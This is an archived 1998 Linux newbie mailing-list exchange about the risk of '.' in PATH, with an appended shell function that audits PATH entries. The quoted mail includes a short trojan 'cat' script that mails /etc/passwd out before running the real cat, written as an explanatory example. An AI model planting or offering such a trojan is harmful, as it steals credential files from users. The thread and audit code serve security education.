On Sun, 30 Aug 1998, Mike wrote:

> Date: Sun, 30 Aug 1998 16:04:59 +0100 (GMT)
> From: Mike <[EMAIL PROTECTED]>
> Reply-To: Mike Ricketts <[EMAIL PROTECTED]>
> To: Gevaerts Frank <[EMAIL PROTECTED]>
> Cc: Kenneth Stephen <[EMAIL PROTECTED]>,
>     linux-newbie <[EMAIL PROTECTED]>
> Subject: Re: Correctness of the newbie FAQ
> 
> On Sat, 29 Aug 1998, Gevaerts Frank wrote:
> 
> > If you don't have '.' in your path, you can't execute programs in the
> > current directory, unless you type in a full pathname. If you have it in
> > your path, and some malicious user makes a nasty script and calls it ls,
> > if you try to do 'ls' in his homedirectory, you will in fact execute his
> > script.
> > You can avoid this by placing '.' last in your path, but as the FAQ points
> > out, our evil user could then make a script 'sl', hoping you would make a
> > typo in his homedirectory.
> > If you don't have '.' in your path at all, but only /bin, /usr/bin ...,
> > you can only execute binaries in those directories, in which normal users
> > can't (or shouldn't be able to) change anything
> > 
> There is an even more serious possibility if a user has '.' at the start
> of their path.  Consider a user with . in their path, who has a login
> script something like:
> # .bash_profile
> 
> # Get the aliases and functions
> if [ -f ~/.bashrc ]; then
>         . ~/.bashrc
> fi
> 
> # User specific environment and startup programs
> 
> PATH=.:$PATH:$HOME/bin
> ENV=$HOME/.bashrc
> USERNAME=""
> 
> export USERNAME ENV PATH
> 
> cat ~/todo
> 
> Now a hacker creates a script in that user's home directory, called cat,
> that does
> #!/bin/bash
> /bin/cat /etc/passwd | mail [EMAIL PROTECTED]
> /bin/cat $*
> 
> Now the next time your user logs in, your password file gets mailed and
> the hacker can carry out a dictionary attack.  Not good.

Aren't we being a bit too paranoid?

First, if he gets access to your account, even ftp only, he might just 
download the /etc/passwd file right away. And second, most systems use
shadow, so /etc/passwd is useless for a cracker.


Karel


   Karel Bemelmans, Narfum Inc.

  [-- Contact --] -->  [EMAIL PROTECTED]
  [-- Website --] -->  http://www.narfum.org
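
An added example, not part of the original mails: a POSIX shell function that audits a PATH string for the problem discussed in this thread. The name audit_path and the sample PATH are constructed here; beyond a literal '.', it also flags empty and relative entries (which the shell resolves against the current directory) and world-writable directories.

```shell
#!/bin/sh
# Added example (not from the original thread): audit a PATH string for entries
# that make the shell search the current directory or a directory that any
# user can write to.

audit_path() {
    # $1: PATH-style string to check; defaults to the caller's $PATH.
    path_value=${1-$PATH}
    findings=0
    position=0
    # Append a colon so a trailing empty entry survives the split below.
    rest="$path_value:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        position=$((position + 1))
        reason=""
        case $entry in
            '')  reason="empty entry, which the shell treats as the current directory" ;;
            .)   reason="current directory" ;;
            /*)  # Absolute: flag only if it exists and is world-writable.
                 # -H makes find inspect the target when the entry is a symlink.
                 if [ -d "$entry" ] &&
                    [ -n "$(find -H "$entry" -prune -perm -0002 2>/dev/null)" ]; then
                     reason="world-writable directory"
                 fi ;;
            *)   reason="relative entry, resolved against the current directory" ;;
        esac
        if [ -n "$reason" ]; then
            echo "entry $position ($entry): $reason"
            findings=$((findings + 1))
        fi
    done
    # Exit status 0 means no risky entries were found.
    [ "$findings" -eq 0 ]
}

# Constructed sample: the PATH shape from the quoted .bash_profile, '.' first.
audit_path ".:/bin:/usr/bin:/home/user/bin" || true
```

Called with no argument, the function checks the current $PATH; a non-zero exit status means at least one entry was flagged.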
